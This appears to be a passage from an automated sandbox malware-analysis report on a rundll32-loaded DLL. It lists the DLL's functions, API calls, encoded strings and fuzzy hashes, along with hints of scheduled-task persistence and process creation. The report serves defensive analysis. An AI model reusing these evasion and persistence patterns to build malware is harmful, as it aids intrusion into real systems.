RtlEnterCriticalSection 15766->15776 15771 6fe6dbef 15768->15771 15769 6fe6dc16 15777 6fe6d9c0 15769->15777 15773 6fe6def9 ___std_exception_copy 39 API calls 15771->15773 15773->15775 15775->14243 15776->15769 15781 6fe6d9d2 __fread_nolock 15777->15781 15783 6fe6d9ef 15777->15783 15778 6fe6d9df 15779 6fe70431 __dosmaperr 14 API calls 15778->15779 15781->15778 15781->15783 15786 6fe6da30 __fread_nolock 15781->15786 15790 6fe6dc4b 15783->15790 15784 6fe6db5b __fread_nolock 15786->15783 15786->15784 15788 6fe6eea2 __fread_nolock 39 API calls 15786->15788 15793 6fe6dc53 15786->15793 15807 6fe6fe17 15786->15807 15788->15786 15900 6fe6cc91 RtlLeaveCriticalSection 15790->15900 15902 6fe6c37b __vfwprintf_l 39 API calls 15901->15902 16035->14280

              Executed Functions

              Function 6FE61B85 Relevance: 35.3, APIs: 11, Strings: 9, Instructions: 303fileCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              APIs
              • FindFirstFileW.KERNELBASE(?,?,?,?,?,3089EAF1), ref: 6FE61C0B
              • _strlen.LIBCMT ref: 6FE61D30
              • ExpandEnvironmentStringsW.KERNEL32(?,?,000000FF), ref: 6FE61D9D
              • FindNextFileW.KERNELBASE(?,?,?,?,?,3089EAF1), ref: 6FE61FAC
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: FileFind$EnvironmentExpandFirstNextStrings_strlen
              • String ID: %s\%s$%s\%s$%s\%s$%s\*.*$-a $GoogleRegisterTask$IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7BbtB>$PT30S$s`bovb-f{f
              • API String ID: 4146766196-3364674013
              • Opcode ID: 2ef09f69e596e96de7b99643f26d60b01687fe9999c6bb1e91738f3d89748fa3
              • Instruction ID: 44b7c5314e9c6876a6fd090f3cdcbd82c15033b698428fbbc8a4217366a73b68
              • Opcode Fuzzy Hash: 2ef09f69e596e96de7b99643f26d60b01687fe9999c6bb1e91738f3d89748fa3
              • Instruction Fuzzy Hash: 45C1BE7198420DABDF21EFA4CC45BED7FB9AF06718F60402AF914DA2C1EB389654CB51
              Function 6FE64402 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 260sleepCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              APIs
                • Part of subcall function 6FE6171F: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6FE6175A
                • Part of subcall function 6FE6171F: _strlen.LIBCMT ref: 6FE6177C
                • Part of subcall function 6FE6171F: GetProcAddress.KERNEL32(?), ref: 6FE617E2
                • Part of subcall function 6FE6171F: _strlen.LIBCMT ref: 6FE6180D
              • _strlen.LIBCMT ref: 6FE64460
              • GetEnvironmentVariableW.KERNEL32(?,?,00000032), ref: 6FE644CA
              • _strlen.LIBCMT ref: 6FE644F0
              • _strlen.LIBCMT ref: 6FE64571
              • _strlen.LIBCMT ref: 6FE645E8
                • Part of subcall function 6FE6192F: _strlen.LIBCMT ref: 6FE619BD
                • Part of subcall function 6FE6192F: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FE874C4), ref: 6FE61A5E
              • Sleep.KERNELBASE(000005DC), ref: 6FE64654
              • Sleep.KERNELBASE(00007530), ref: 6FE6465F
              • _strlen.LIBCMT ref: 6FE64685
              • _strlen.LIBCMT ref: 6FE64706
                • Part of subcall function 6FE61B85: FindFirstFileW.KERNELBASE(?,?,?,?,?,3089EAF1), ref: 6FE61C0B
              Strings
              • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB, xrefs: 6FE644D0
              • %s%s, xrefs: 6FE6452F
              • [BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB, xrefs: 6FE64665
              • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>, xrefs: 6FE646E6
              • gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>, xrefs: 6FE64440
              • %s%s, xrefs: 6FE64745
              • %s%s, xrefs: 6FE646C4
              • VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>, xrefs: 6FE64551
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB, xrefs: 6FE645C8
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: _strlen$Sleep$AddressCreateEnvironmentFileFindFirstHandleModuleProcProcessVariable
              • String ID: %s%s$%s%s$%s%s$VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>$[BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB$gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>
              • API String ID: 405535372-2132796354
              • Opcode ID: 7b7271c7acb1a83617d7dd1022b2b19ee3c62c0dae742cf906c7f0d0afed26df
              • Instruction ID: 3046ba41fce64d4b327e009d71c8206825713b6ddd79a6ae31d9639d0b8d10e6
              • Opcode Fuzzy Hash: 7b7271c7acb1a83617d7dd1022b2b19ee3c62c0dae742cf906c7f0d0afed26df
              • Instruction Fuzzy Hash: B1A11AB2C4024CAFDF71DBE8DC85FDD7BB9AF19208F24001AE918A7182EB3596158F55
              Function 6FE6192F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 174processCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              APIs
              • _strlen.LIBCMT ref: 6FE619BD
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FE874C4), ref: 6FE61A5E
              • _strlen.LIBCMT ref: 6FE61AC4
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FE874E0), ref: 6FE61B60
              Strings
              • %s %s, xrefs: 6FE61A24
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB, xrefs: 6FE61AA4
              • `dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>, xrefs: 6FE6199D
              • %s %s, xrefs: 6FE61B26
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: CreateProcess_strlen
              • String ID: %s %s$%s %s$`dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB
              • API String ID: 3222040079-4228346574
              • Opcode ID: 13c46e3dc49025af4d608e690a42cabcfa5095103fb65547fa1b8daaa755b33c
              • Instruction ID: bb419dd8b932c6b7e6cfccfbbcbc925a4b4bb1c1b0062abe828f7a1d6985310a
              • Opcode Fuzzy Hash: 13c46e3dc49025af4d608e690a42cabcfa5095103fb65547fa1b8daaa755b33c
              • Instruction Fuzzy Hash: 6E513171D8024CABEB31DFE4DC41FDD7FA8AF15748F24001AE618EA1C2E7B566148B55
              Function 6FE64D53 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 192 6fe64d53-6fe64d64 call 6fe65570 195 6fe64d66-6fe64d6c 192->195 196 6fe64d75-6fe64d7c 192->196 195->196 197 6fe64d6e-6fe64d70 195->197 198 6fe64d7e-6fe64d81 196->198 199 6fe64d88-6fe64d9c dllmain_raw 196->199 200 6fe64e4e-6fe64e5d 197->200 198->199 201 6fe64d83-6fe64d86 198->201 202 6fe64e45-6fe64e4c 199->202 203 6fe64da2-6fe64db3 dllmain_crt_dispatch 199->203 204 6fe64db9-6fe64dbe call 6fe61000 201->204 202->200 203->202 203->204 206 6fe64dc3-6fe64dcb 204->206 207 6fe64df4-6fe64df6 206->207 208 6fe64dcd-6fe64dcf 206->208 209 6fe64dfd-6fe64e0e dllmain_crt_dispatch 207->209 210 6fe64df8-6fe64dfb 207->210 208->207 211 6fe64dd1-6fe64def call 6fe61000 call 6fe64ca3 dllmain_raw 208->211 209->202 212 6fe64e10-6fe64e42 dllmain_raw 209->212 210->202 210->209 211->207 212->202
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: dllmain_raw$dllmain_crt_dispatch
              • String ID:
              • API String ID: 3136044242-0
              • Opcode ID: e4b92d6dc209aadc5112f98f2f905e16d4d20f9724e1be56ca310422b948b46d
              • Instruction ID: 4e0b3992bae2371221a20d840c16b666b5be180a1f5955a7af391c6495f688f4
              • Opcode Fuzzy Hash: e4b92d6dc209aadc5112f98f2f905e16d4d20f9724e1be56ca310422b948b46d
              • Instruction Fuzzy Hash: E021BF72D8062DAFCB228F55CD50AAF3E69FF81A98B21411BF8246B350D3319D018B90
              Function 6FE64B9C Relevance: 3.1, APIs: 2, Instructions: 76COMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • __RTC_Initialize.LIBCMT ref: 6FE64BE9
                • Part of subcall function 6FE650D5: RtlInitializeSListHead.NTDLL(6FE86DC0), ref: 6FE650DA
              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6FE64C53
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
              • String ID:
              • API String ID: 3231365870-0
              • Opcode ID: 3028e95199ef96235e5f6bee9920ce652f7a8b8c431defc53b6db68fd84b3db9
              • Instruction ID: 8a81ea3a9c337c1e26753d221442aa6712a23d048c368f11efaa9991da66a8bd
              • Opcode Fuzzy Hash: 3028e95199ef96235e5f6bee9920ce652f7a8b8c431defc53b6db68fd84b3db9
              • Instruction Fuzzy Hash: 7F218E356C470E9AEB21ABB888247983FA2AB1323CF30041FD4616B3C2DB625544D756
              Function 6FE71658 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 261 6fe71658-6fe71663 262 6fe71665-6fe7166f 261->262 263 6fe71671-6fe71677 261->263 262->263 264 6fe716a5-6fe716b0 call 6fe70431 262->264 265 6fe71690-6fe716a1 RtlAllocateHeap 263->265 266 6fe71679-6fe7167a 263->266 271 6fe716b2-6fe716b4 264->271 267 6fe716a3 265->267 268 6fe7167c-6fe71683 call 6fe75ac9 265->268 266->265 267->271 268->264 274 6fe71685-6fe7168e call 6fe6df8f 268->274 274->264 274->265
              APIs
              • RtlAllocateHeap.NTDLL(00000008,6FE61775,6FE6C75A), ref: 6FE71699
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 6881c7ab9d55a6b0d1e77cf6cd0d47342df950b8cfa1dbd3ef6a0ce2323f986f
              • Instruction ID: 1a7d8e37d25b2e0cdeb482b462f05b48b852b65628a4eaa0e479414a7d99e321
              • Opcode Fuzzy Hash: 6881c7ab9d55a6b0d1e77cf6cd0d47342df950b8cfa1dbd3ef6a0ce2323f986f
              • Instruction Fuzzy Hash: B4F0B4356447255BAB319AE68824A9B3F699F42778B384126EC14AA284DF38F411C6A1
              Function 6FE61000 Relevance: 1.5, APIs: 1, Instructions: 12COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 277 6fe61000-6fe6100e 278 6fe61012-6fe61019 call 6fe64402 ExitProcess 277->278 279 6fe61010-6fe6101f 277->279
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: 04bd3f86e85efb6cfc76c75e5919b3835756a2f9ae06651e239cda1377ee7493
              • Instruction ID: ccbd3bb3cb85fc4738a451f212ee0c52770b49ea02c20f98777bc4b602656d33
              • Opcode Fuzzy Hash: 04bd3f86e85efb6cfc76c75e5919b3835756a2f9ae06651e239cda1377ee7493
              • Instruction Fuzzy Hash: D4D0127458524CEBCF41DBF4850AB8D7FEAEB0AB25F608026E514D7240D634AE05E721

              Non-executed Functions

              Function 6FE75C80 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
              • Instruction ID: 8013fa1b9557c93d7e3edd25f5d64c4ebcc02f53cfd21c7a1342f4acbf043af8
              • Opcode Fuzzy Hash: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
              • Instruction Fuzzy Hash: 0D023171E012199FDB24CFA8C99069EFBF5FF49318F24826AD519E7381DB31A941CB90
              Function 6FE653EE Relevance: 6.1, APIs: 4, Instructions: 70COMMON
              Download Yara Rule
              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6FE653FA
              • IsDebuggerPresent.KERNEL32 ref: 6FE654C6
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FE654DF
              • UnhandledExceptionFilter.KERNEL32(?), ref: 6FE654E9
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
              • String ID:
              • API String ID: 254469556-0
              • Opcode ID: 9ce0bfc0883e1274f364732ec59c9b143baae46dc5d7d849423cd5f050b28d95
              • Instruction ID: e8d3abf87be884c9613e770dc3203dad03b2b98e24691a1ff4a234d995c93de5
              • Opcode Fuzzy Hash: 9ce0bfc0883e1274f364732ec59c9b143baae46dc5d7d849423cd5f050b28d95
              • Instruction Fuzzy Hash: 15310779D0532C9ADF20DFA4C849BCDBBB9AF08304F1041AAE40DAB240E7709A85CF44
              Function 6FE6171F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 174libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Strings
              • QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>, xrefs: 6FE61765
              • kernel32.dll, xrefs: 6FE61755
              • QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>, xrefs: 6FE61887
              • QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>, xrefs: 6FE617F6
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: AddressProc_strlen$HandleModule
              • String ID: QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>$QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>$QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>$kernel32.dll
              • API String ID: 3538810943-2765630095
              • Opcode ID: bcefa24b69df3bf6b2cb35e3e79e044097d6202c31b98988c83c9bcc0f5b8033
              • Instruction ID: e6bb7c394bba7d95ed02ed1c47d9eba21ba0b28642ad3200cf06b27250383cf3
              • Opcode Fuzzy Hash: bcefa24b69df3bf6b2cb35e3e79e044097d6202c31b98988c83c9bcc0f5b8033
              • Instruction Fuzzy Hash: 4361F275D4025C9FDB21DBF8DD44A9DBFB9BB1A318F34412EE854A7282DB34A9198F00
              Function 6FE78279 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 6FE77FC0: CreateFileW.KERNEL32(00000000,00000000,?,6FE78322,?,?,00000000,?,6FE78322,00000000,0000000C), ref: 6FE77FDD
              • GetLastError.KERNEL32 ref: 6FE7838D
              • __dosmaperr.LIBCMT ref: 6FE78394
              • GetFileType.KERNEL32(00000000), ref: 6FE783A0
              • GetLastError.KERNEL32 ref: 6FE783AA
              • __dosmaperr.LIBCMT ref: 6FE783B3
              • CloseHandle.KERNEL32(00000000), ref: 6FE783D3
              • CloseHandle.KERNEL32(00000000), ref: 6FE78520
              • GetLastError.KERNEL32 ref: 6FE78552
              • __dosmaperr.LIBCMT ref: 6FE78559
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              • API String ID: 4237864984-2852464175
              • Opcode ID: b9f1ad80d7fa68b596959e60c0dedfbb580ba0431484789a89116b446a8d1955
              • Instruction ID: 4592d689392e4496fdd5ae1996d041297ff79b53c9b98b17bf7acb56d3376ad2
              • Opcode Fuzzy Hash: b9f1ad80d7fa68b596959e60c0dedfbb580ba0431484789a89116b446a8d1955
              • Instruction Fuzzy Hash: B2A10232A086549FCF299F68D850BAE3FB2AB07328F34025DE9119F3D0DB359912CB51
              Function 6FE7ADE3 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RtlDecodePointer.NTDLL(?), ref: 6FE7ADFC
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
              • Associated: 00000003.00000002.2133569723.000000006FE60000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE86000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133601601.000000006FE8B000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133707700.000000006FE8D000.00000080.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2133752630.000000006FE8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6fe60000_rundll32.jbxd
              Similarity
              • API ID: DecodePointer
              • String ID: acos$asin$exp$log$log10$pow$sqrt
              • API String ID: 3527080286-3064271455
              • Opcode ID: 3a80c06b723a0d61e07900415e5b6c940f94576028ae2b9c75e0b40a2023a773
              • Instruction ID: dafaef81722471d0a6efcc6faffb3633a63bda66149eb99cf70bb73e11f6cd15
              • Opcode Fuzzy Hash: 3a80c06b723a0d61e07900415e5b6c940f94576028ae2b9c75e0b40a2023a773
              • Instruction Fuzzy Hash: 77517FB098454ACBCB28AFA9D9492EDBF70FF86714F204155E460A6374CF34D562CB51
              Function 6FE66ADA Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • type_info::operator==.LIBVCRUNTIME ref: 6FE66BF9
              • ___TypeMatch.LIBVCRUNTIME ref: 6FE66D07
              • _UnwindNestedFrames.LIBCMT ref: 6FE66E59
              • CallUnexpected.LIBVCRUNTIME ref: 6FE66E74
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2133601601.000000006FE61000.00000040.00000001.01000000.00000003.sdmp, Offset: 6FE60000, based on PE: true
